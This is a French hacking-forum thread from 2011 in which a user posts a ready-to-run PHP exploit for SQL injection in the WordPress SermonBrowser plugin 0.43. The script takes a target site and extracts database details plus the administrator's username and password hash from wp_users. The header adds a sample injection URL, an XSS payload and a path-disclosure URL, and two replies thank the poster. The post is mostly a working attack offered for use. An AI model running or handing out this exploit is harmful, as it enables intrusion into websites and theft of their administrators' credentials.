FranceHack Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
WordPress SermonBrowser Plugin 0.43 SQL Injection

 
Répondre au sujet    FranceHack Index du Forum » Failles et Exploits » SQL Sujet précédent
Sujet suivant
WordPress SermonBrowser Plugin 0.43 SQL Injection
Auteur Message
KBtarantino
Invité

Hors ligne




Message WordPress SermonBrowser Plugin 0.43 SQL Injection Répondre en citant
WordPress SermonBrowser Plugin 0.43 SQL Injection

 
 
<?php
 
 if( ! $argv[1])
 die("
 
 Usage   : php exploit.php [site]
 Example : php exploit.php http://site.com/wp/
 
 ");
 print_r("
 
 # Tilte......: [ WordPress SermonBrowser Plugin 0.43 SQL Injection ]
 # Author.....: [ Ma3sTr0-Dz ]
 # Date.......: [ 25-o4-2o11 ]
 # Location ..: [ ALGERIA ]
 # HoMe ......: [ [url=http://www.sec4ever.com/]http://wWw.sEc4EvEr.CoM[/url] ]
 # Download ..: [ http://www.4-14.org.uk/wordpress-plugins/sermon-browser ]
 # Gr33tz ....: [ All Sec4ever Member'z ]
 # Real Bug Founder : Lagripe-Dz
 
                       -==[ ExPloiT ]==-
                       
 # SQL Inj : [url=http://site/wp/?sermon_id=-1+union+select+version%28%29,2--]http://site/wp/?sermon_id=-1 union select version(),2--[/url]
 # XSS     : [url=http://site/wp/?download&file_name=%3Cscript%3Ealert%280%29%3C/script%3E]http://site/wp/?download&file_name=<script>alert(0)</script&gt…[/url]
 # FPD     : http://site/wp/wp-content/plugins/sermon-browser/sermon.php
 
                        -==[ Start ]==-
 
 ");
 
   $t=array("db_usr"=>"user()","db_ver"=>"version()","db_nam"=>"database()","usr_nm"=>"user_login","passwd"=>"user_pass");
 
 function text2hex($string) {
  $hex = '';
  $len = strlen($string) ;
  for ($i = 0; $i < $len; $i++) {
   $hex .= str_pad(dechex(ord($string[$i])), 2, 0, STR_PAD_LEFT);
  }
  return $hex;
 }
 
 foreach($t as $r=>$y){
 
   $x=@file_get_contents($argv[1]."?sermon_id=-1/**/UnIoN/**/SeLeCt/**/group_concat(0x".text2hex("<$r>").",$y,0x".text2hex("<$r>")."),2+from+wp_users+where+ID=1--");
 
 preg_match_all("{<$r>(.* ? )<$r>}i",$x, $dz);
 
 echo $u = ($dz[1][0])  ?  "[-] $r  : ".$dz[1][0]."\n" : "[-] $r  : Failed  ! \n";
 
 }
 
 print_r("
                       -==[ Finished ]==-
 ");
 
 # By Lagripe-Dz ..  !
 # END ..  !
 
  ? >

 




Dim 8 Mai - 19:22 (2011)
Publicité






Message Publicité
PublicitéSupprimer les publicités ?

Dim 8 Mai - 19:22 (2011)
Yohann666
Invité

Hors ligne




Message WordPress SermonBrowser Plugin 0.43 SQL Injection Répondre en citant
Merci pour se tutoriel 


Dim 8 Mai - 23:32 (2011)
KBtarantino
Invité

Hors ligne




Message WordPress SermonBrowser Plugin 0.43 SQL Injection Répondre en citant
De rien 


Lun 9 Mai - 17:42 (2011)
Contenu Sponsorisé






Message WordPress SermonBrowser Plugin 0.43 SQL Injection

Aujourd’hui à 01:14 (2016)
Montrer les messages depuis:    
Répondre au sujet    FranceHack Index du Forum » Failles et Exploits » SQL Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 

Portail | Index | créer un forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Music Lyrics.Traduction par : phpBB-fr.com